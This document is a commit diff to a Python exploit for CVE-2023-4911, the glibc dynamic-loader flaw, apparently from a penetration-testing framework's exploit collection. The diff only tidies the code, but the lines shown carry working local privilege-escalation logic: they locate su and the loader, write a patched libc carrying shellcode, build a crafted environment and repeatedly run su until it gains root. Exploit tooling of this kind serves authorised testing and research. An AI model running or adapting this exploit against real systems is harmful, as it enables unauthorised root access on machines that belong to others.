Updated python exploit

data/exploits/CVE-2023-4911/cve_2023_4911.py

@@ -57,6 +57,7 @@ TARGETS = {
     },
 }
 
+# Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py
 BUILD_IDS = {
     "69c048078b6c51fa8744f3d7cff3b0d9369ffd53": 561,
     "3602eac894717d56555552c84fc6b0e4d6a4af72": 561,
@@ -96,7 +97,7 @@ def parse_structured_data(structure_format, structure_keys, structure_data):
     return parsed_structure
 
 
-def fetch_library_path(library_name):
+def fetch_c_library_path():
     class LoadedLibrary(Structure):
         _fields_ = [("l_addr", c_void_p), ("l_name", c_char_p)]
 
@@ -267,18 +268,14 @@ if __name__ == "__main__":
     architecture = os.uname().machine
 
     if architecture not in TARGETS.keys():
-        error_and_exit("This target's architecturs '%s' is not supported by this exploit" % architecture)
-
-    c_library_path = fetch_library_path("c")
-
-    #print("Found libc = %s" % c_library_path.decode())
+        error_and_exit("This target's architecture '%s' is not supported by this exploit" % architecture)
 
+    c_library_path = fetch_c_library_path()
     su_binary_path = which("su")
 
     memory_alignment = ((0x100 - (len(su_binary_path) + 1 + 8)) & 7) + 8
     su_binary_elf = DelayedElfParser(su_binary_path)
     dynamic_linker_path = su_binary_elf.extract_section_by_name(".interp").strip(b"\x00").decode('utf-8')
-    #print("Dynamic linker path: ", dynamic_linker_path)
     dynamic_linker_elf = DelayedElfParser(dynamic_linker_path)
     dynamic_linker_build_id = binascii.hexlify(
         dynamic_linker_elf.extract_section_by_name(GNU_BUILD_ID)[-20:]).decode()
@@ -292,18 +289,12 @@ if __name__ == "__main__":
     if libc_start_main == None:
         error_and_exit("The symbol in the libc ELF '__libc_start_main' could not be resolved.")
 
-    #print("__libc_start_main = 0x%x" % libc_start_main)
-
     su_binary_offset = su_binary_elf.extract_section_header_by_name(".dynstr")["offset"]
     potential_path = find_path_before_null_character(su_binary_elf.data, su_binary_offset)
 
     if potential_path is None:
         error_and_exit("The potential path in the su_binary could not be found.")
 
-    #print("The potential path in the su binary was found.")
-    #print("Using path %s", potential_path["path"])
-    #print("At offset %d", potential_path["offset"])
-
     if not os.path.exists(potential_path["path"]):
         os.mkdir(potential_path["path"])
 
@@ -311,7 +302,6 @@ if __name__ == "__main__":
         file_handle.write(libc_elf.data[0:libc_start_main])
         file_handle.write(TARGETS[architecture]["shellcode"])
         file_handle.write(libc_elf.data[libc_start_main + len(TARGETS[architecture]["shellcode"]):])
-    #print("Patched up libc.so.6")
 
     stack_address = TARGETS[architecture]["stack_top"] - (1 << (TARGETS[architecture]["stack_aslr_bits"]))
 
@@ -321,18 +311,11 @@ if __name__ == "__main__":
         if (stack_address >> (i * 8)) & 0xFF == 0:
             stack_address |= 0x10 << (i * 8)
 
-    #print("The stack address being used is: 0x%x" % stack_address)
-
     environment = create_environment(BUILD_IDS[dynamic_linker_build_id], stack_address, potential_path["offset"],
                                      su_binary_elf.architecture)
     count = 1
-    #print('Entering the true loop')
     argv = [b"su", b"--help", None]
     while True:
-        #if count % 0x10 == 0:
-        #    sys.stdout.write(".")
-        #    sys.stdout.flush()
         if execute_and_monitor(su_binary_path.encode(), argv, environment) == "Success":
-            #print("After %d tries: booya" % count)
             exit(0)
         count += 1